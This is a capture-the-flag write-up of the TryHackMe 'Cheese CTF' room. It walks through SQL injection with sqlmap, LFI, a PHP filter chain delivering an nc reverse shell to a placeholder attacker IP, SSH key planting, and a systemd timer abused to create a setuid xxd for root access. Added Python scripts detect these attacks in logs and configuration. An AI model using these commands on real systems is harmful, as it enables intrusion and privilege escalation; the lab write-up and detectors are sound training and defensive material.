Introduction
This article is a writeup of a TryHackMe room.
The room is Cheese CTF and its difficulty is Easy.
In this room you can learn skills related to PHP filter chains and systemctl.
Port Scan
First, run a port scan.
Running the port scan shows that a very large number of ports are reported as open.
Example output
Nmap done: 1 IP address (1 host up) scanned in 16.63 seconds
Given the result above, the host answers SYN/ACK on every probed port, so it appears to have some kind of port-scan countermeasure in place.
To work around this, add the -sX option and run a Xmas scan.
$ sudo nmap -sX <IP address>
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 20:31 JST
Nmap scan report for 10.10.123.5
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
4444/tcp open|filtered krb524
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds
After the Xmas scan, a sensible set of port-scan results was obtained.
Enumeration
Based on the port-scan results, accessing port 80 displays the page shown below.
A login page is present.
sqlmap
To investigate the login page, use sqlmap.
To use sqlmap, run Burp Suite, intercept the request to the login page, and save the intercepted request to a file for sqlmap.
$ sqlmap -r login.req http://<IP address>
___
__H__
___ ___[']_____ ___ ___ {1.8.8#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:52:13 /2024-10-25/
[20:52:13] [INFO] parsing HTTP request from 'login.req'
[20:52:14] [INFO] testing connection to the target URL
[20:52:14] [INFO] testing if the target URL content is stable
[20:52:14] [INFO] target URL content is stable
[20:52:14] [INFO] testing if POST parameter 'username' is dynamic
[20:52:15] [WARNING] POST parameter 'username' does not appear to be dynamic
[20:52:15] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[20:52:15] [INFO] testing for SQL injection on POST parameter 'username'
[20:52:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:52:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:52:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:52:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:52:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:52:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:52:24] [INFO] testing 'Generic inline queries'
[20:52:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:52:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:52:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:52:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:52:41] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:52:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:52:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://10.10.123.5/secret-script.php?file=supersecretadminpanel.html'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
[20:52:57] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[20:53:16] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:53:16] [INFO] checking if the injection point on POST parameter 'username' is a false positive
sqlmap identified the following injection point(s) with a total of 96 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))pbJi) AND 'KNhW'='KNhW&password=1
---
[20:54:34] [INFO] the back-end DBMS is MySQL
[20:54:34] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[20:54:34] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:54:40] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.123.5'
[*] ending @ 20:54:40 /2024-10-25/
From the sqlmap output, a redirect to http://10.10.123.5/secret-script.php?file=supersecretadminpanel.html was detected.
The same redirect to secret-script.php?file=supersecretadminpanel.html can also be reached by performing the SQL injection by hand.
Vulnerability Analysis
Based on the sqlmap result, accessing http://10.10.123.5/secret-script.php?file=supersecretadminpanel.html displays the page shown below.
To test for LFI, the /etc/passwd file was specified as the value of the query parameter, and the contents of the file were returned.
Continuing the investigation, the Messages page loads resources through the file parameter, and a PHP filter is applied when the resource is included.
System Hacking
A PHP filter chain is used to establish a foothold.
Gaining Access
php://filter is one of PHP's stream wrappers; it applies a given filter to data as it is read or written.
PHP stream wrappers provide an abstract interface for accessing external resources such as files and data streams. Filters can be applied while reading or writing a file to perform specific encoding, decoding, or conversion operations.
To obtain a reverse shell, generate the PHP filter chain with the tool below (php_filter_chain_generator.py).
When running the tool, pass the command that spawns the reverse shell as the --chain argument.
$ python php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <Your IP address> <Port> >/tmp/f"); ?>' | grep '^php' > payload.txt
With a listener waiting, requesting the generated payload triggers the reverse shell.
$ curl -s "http://<IP address>/secret-script.php?file=$(cat payload.txt)"
listening on [any] 4444 ...
connect to [<Your IP address>] from (UNKNOWN) [10.10.123.5] 39838
sh: 0: can't access tty; job control turned off
$
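As an added, defender-side example that is not part of the original writeup: a small Python checker that flags the two request shapes seen above (an absolute path or traversal in the file parameter, and a php://filter chain) in Apache combined-format access-log lines. The log lines and the short filter chain are constructed samples, not the real traffic or payload.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log line: client, timestamp, quoted request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Stream wrappers that have no business in a file-include parameter.
STREAM_WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://", "glob://", "file://")


def analyse_file_param(value):
    """Return the indicators found in one (already URL-decoded) value of the include parameter."""
    found = []
    low = value.lower()
    if low.startswith(STREAM_WRAPPERS):
        found.append("stream-wrapper")
    if low.startswith("php://filter/"):
        # Filter-chain generators stack many '|'-separated convert.* filters in
        # front of /resource=; record the chain length as part of the indicator.
        chain = low[len("php://filter/"):].split("/resource=", 1)[0]
        filters = [f for f in chain.split("|") if f]
        found.append("filter-chain:%d" % len(filters))
    if value.startswith("/") or "../" in value or "..\\" in value:
        found.append("traversal-or-absolute-path")
    if "\x00" in value:
        found.append("null-byte")
    return found


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def file_param_values(target, param="file"):
    """Extract every (decoded) value of the include parameter from a request target (path?query)."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])


def scan_log(lines, param="file"):
    """Return one record per request whose include parameter carries at least one indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for value in file_param_values(rec["target"], param):
            indicators = analyse_file_param(value)
            if indicators:
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                             "file": value, "indicators": indicators})
    return hits


# Constructed sample lines (not real traffic from the box); the filter chain here is a
# short, non-functional stand-in for the much longer chain a generator emits.
SAMPLE_LOG = [
    '10.10.14.2 - - [25/Oct/2024:11:40:01 +0000] "GET /secret-script.php?file=supersecretadminpanel.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [25/Oct/2024:11:41:17 +0000] "GET /secret-script.php?file=/etc/passwd HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [25/Oct/2024:11:43:05 +0000] "GET /secret-script.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [25/Oct/2024:11:52:03 +0000] "GET /secret-script.php?file=php://filter/convert.iconv.UTF8.UTF16|convert.base64-encode|convert.iconv.UTF16.UTF8|convert.base64-decode/resource=php://temp HTTP/1.1" 200 0 "-" "curl/8.5.0"',
    '10.10.14.2 - - [25/Oct/2024:11:53:40 +0000] "GET /index.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], ",".join(hit["indicators"]), hit["file"])
```

Point it at a real log with `scan_log(open("/var/log/apache2/access.log"))`; a single filter-chain hit with status 200 is worth treating as a confirmed include of attacker-controlled content rather than a probe.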
The shell obtained this way is unstable, so stabilise it.
$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cheesectf:/var/www/html$ ^Z
[1]+ 停止 nc -lnvp 4444
┌──(kali㉿kali)-[~/Downloads]
└─$ stty raw -echo; fg
nc -lnvp 4444
export TERM=xterm
www-data@cheesectf:/var/www/html$ export SHELL=bash
User Flag
For lateral movement, investigate with LinPEAS.
After running linpeas.sh, check the section Interesting writable files owned by me or writable by everyone (not in Home) (max 500).
/dev/mqueue
/dev/shm
/etc/systemd/system/exploit.timer
/home/comte/.ssh/authorized_keys
/run/lock
/run/lock/apache2
/run/screen
/snap/core20/2015/run/lock
/snap/core20/2015/tmp
/snap/core20/2015/var/tmp
/snap/core20/2182/run/lock
/snap/core20/2182/tmp
/snap/core20/2182/var/tmp
/tmp
/tmp/linpeas.sh
/tmp/tmux-33
/var/cache/apache2/mod_cache_disk
/var/crash
/var/lib/php/sessions
/var/tmp
The result above shows that the /home/comte/.ssh/authorized_keys file is writable by everyone.
-rw-rw-rw- 1 comte comte 0 Mar 25 2024 /home/comte/.ssh/authorized_keys
Run the ssh-keygen command and append the generated SSH public key to the /home/comte/.ssh/authorized_keys file.
ssh-ed25519 ********************************************************************
Log in as the comte user using the generated SSH private key.
$ ssh -i ssh_id.rsa comte@<IP address>
The user flag can be seen.
total 52
drwxr-xr-x 7 comte comte 4096 Apr 4 2024 ./
drwxr-xr-x 3 root root 4096 Sep 27 2023 ../
lrwxrwxrwx 1 comte comte 9 Apr 4 2024 .bash_history -> /dev/null
-rw-r--r-- 1 comte comte 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 comte comte 3771 Feb 25 2020 .bashrc
drwx------ 2 comte comte 4096 Sep 27 2023 .cache/
drwx------ 3 comte comte 4096 Mar 25 2024 .gnupg/
drwxrwxr-x 3 comte comte 4096 Mar 25 2024 .local/
-rw-r--r-- 1 comte comte 807 Feb 25 2020 .profile
drwx------ 3 comte comte 4096 Mar 25 2024 snap/
drwxr-xr-x 2 comte comte 4096 Mar 25 2024 .ssh/
-rw-r--r-- 1 comte comte 0 Sep 27 2023 .sudo_as_admin_successful
-rw------- 1 comte comte 4276 Sep 15 2023 user.txt
-rw------- 1 comte comte 55 Apr 4 2024 .Xauthority
Root Flag
Obtaining the root flag requires privilege escalation.
Running sudo -l produces the following output.
User comte may run the following commands on cheesectf:
(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer
The result above shows that exploit.timer, which is registered with systemctl, can be started.
Check the contents of /etc/systemd/system/exploit.timer and /etc/systemd/system/exploit.service.
- /etc/systemd/system/exploit.timer
[Unit]
Description=Exploit Timer

[Timer]
OnBootSec=

[Install]
WantedBy=timers.target
- /etc/systemd/system/exploit.service
[Unit]
Description=Exploit Service

[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"
OnBootSec is the setting that makes the timer run its service a given time after system boot. To make use of /etc/systemd/system/exploit.timer, set the value of OnBootSec to 0. This causes the service unit associated with the timer to be started.
OnBootSec=0
Run the systemctl command to check the current state of exploit.timer.
$ systemctl status exploit.timer
●exploit.timer - Exploit Timer
Loaded: loaded (/etc/systemd/system/exploit.timer; disabled; vendor preset: enabled)
Active: inactive (dead)
Trigger: n/a
Triggers: ●exploit.service
$ systemctl status exploit.service
●exploit.service - Exploit Service
Loaded: loaded (/etc/systemd/system/exploit.service; static; vendor preset: enabled)
Active: inactive (dead)
Reload systemd and start exploit.timer.
$ sudo /bin/systemctl daemon-reload
$ sudo /bin/systemctl start exploit.timer
Check the state again.
$ systemctl status exploit.timer
●exploit.timer - Exploit Timer
Loaded: loaded (/etc/systemd/system/exploit.timer; disabled; vendor preset: enabled)
Active: active (elapsed) since Fri 2024-10-25 12:21:30 UTC; 1min 15s ago
Trigger: n/a
Triggers:●exploit.service
$ systemctl status exploit.service
●exploit.service - Exploit Service
Loaded: loaded (/etc/systemd/system/exploit.service; static; vendor preset: enabled)
Active: inactive (dead) since Fri 2024-10-25 12:21:30 UTC; 3s ago
TriggeredBy: ●exploit.timer
Process: 27536 ExecStart=/bin/bash -c /bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd (code=exited, status=0/SUCCESS)
Main PID: 27536 (code=exited, status=0/SUCCESS)
After starting exploit.timer, change to the /opt directory and run ls; an xxd binary with the setuid and setgid bits set (rws) has been created.
total 28
drwxr-xr-x 2 root root 4096 Oct 25 12:21 ./
drwxr-xr-x 19 root root 4096 Sep 27 2023 ../
-rwsr-sr-x 1 root root 18712 Oct 25 12:21 xxd*
Running the following commands reads the root flag.
$ LFILE=/root/root.txt
$ ./xxd "$LFILE" | xxd -r
_ _ _ _ __
___| |__ ___ ___ ___ ___ (_)___ | (_)/ _| ___
/ __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | | __/ __/\__ \ __/ | \__ \ | | | _| __/
\___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_| \___|
THM{****************************************}
To escalate to the root user, the same approach can be used.
$ echo 'ssh-ed25519 ********************************************************************' | /opt/xxd | /opt/xxd -r - /root/.ssh/authorized_keys
$ ssh -i ssh_id.rsa root@<IP address>
uid=0(root) gid=0(root) groups=0(root)
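As an added, defender-side example (not part of the original writeup): a Python audit of the escalation chain above, which combines sudo -l rules, the systemd unit files, and file modes to report a NOPASSWD systemctl rule that can launch a unit writable by non-root, or whose ExecStart sets the setuid bit. The sudo -l text and unit contents are the ones shown in this room; the file modes are constructed, since the page only shows that the timer is writable.

```python
import os
import re
import shlex

UNIT_DIR = "/etc/systemd/system/"   # where the units on this box live (assumption)

# One "sudo -l" entry: "(runas) TAG: TAG: command args".
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")
# chmod invocations that add setuid/setgid: "+s", "u+s", "+sx", "4755", "6755", ...
SETUID_RE = re.compile(r"chmod\s+(?:[ugoa]*\+[rwxX]*s|[2-7][0-7]{3}\b)")


def parse_sudo_rules(text):
    """Turn 'sudo -l' output into rule dicts; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        rules.append({"runas": m.group("runas"),
                      "nopasswd": "NOPASSWD" in m.group("tags"),
                      "argv": shlex.split(m.group("cmd"))})
    return rules


def parse_unit(text):
    """Minimal systemd unit parser: {section: {key: [values...]}} (keys may repeat)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def reachable_units(unit, unit_files):
    """The unit itself plus, for a timer, the service it triggers ([Timer] Unit= or same stem)."""
    units = [unit]
    if unit.endswith(".timer"):
        timer = unit_files.get(unit, {}).get("Timer", {})
        units.append(timer.get("Unit", [unit[:-len(".timer")] + ".service"])[-1])
    return units


def audit(sudo_text, unit_files, modes):
    """Report units a NOPASSWD systemctl rule can launch that are writable or that plant a setuid file."""
    launchable = {}   # unit name -> set of "verb unit" sudo commands reaching it
    for rule in parse_sudo_rules(sudo_text):
        argv = rule["argv"]
        if not rule["nopasswd"] or len(argv) < 3 or os.path.basename(argv[0]) != "systemctl":
            continue   # e.g. "systemctl daemon-reload" names no unit
        for name in reachable_units(argv[2], unit_files):
            launchable.setdefault(name, set()).add(" ".join(argv[1:]))
    findings = []
    for name, via in sorted(launchable.items()):
        mode = modes.get(UNIT_DIR + name)
        if mode is not None and mode & 0o022:   # group- or world-writable
            findings.append({"unit": name, "issue": "writable-by-non-root",
                             "mode": "%04o" % mode, "via": sorted(via)})
        for cmd in unit_files.get(name, {}).get("Service", {}).get("ExecStart", []):
            if SETUID_RE.search(cmd):
                findings.append({"unit": name, "issue": "execstart-sets-setuid",
                                 "command": cmd, "via": sorted(via)})
    return findings


# Inputs as shown on this box (sudo -l output and unit contents).
SUDO_L = """\
User comte may run the following commands on cheesectf:
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) NOPASSWD: /bin/systemctl restart exploit.timer
    (ALL) NOPASSWD: /bin/systemctl start exploit.timer
    (ALL) NOPASSWD: /bin/systemctl enable exploit.timer
"""
RAW_UNITS = {
    "exploit.timer": "[Unit]\nDescription=Exploit Timer\n\n[Timer]\nOnBootSec=\n\n[Install]\nWantedBy=timers.target\n",
    "exploit.service": "[Unit]\nDescription=Exploit Service\n\n[Service]\nType=oneshot\n"
                       'ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"\n',
}
UNIT_FILES = {name: parse_unit(text) for name, text in RAW_UNITS.items()}
# Constructed modes (os.stat(path).st_mode & 0o777): LinPEAS only reported the timer as writable.
MODES = {UNIT_DIR + "exploit.timer": 0o666, UNIT_DIR + "exploit.service": 0o644}

if __name__ == "__main__":
    for finding in audit(SUDO_L, UNIT_FILES, MODES):
        print(finding)
```

On a live host, build MODES from os.stat() over the unit directory and UNIT_FILES from the files themselves; either finding alone is enough to justify removing the sudo rule or fixing the unit's ownership and mode.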
Conclusion
This was an interesting room that puts your enumeration skills to the test.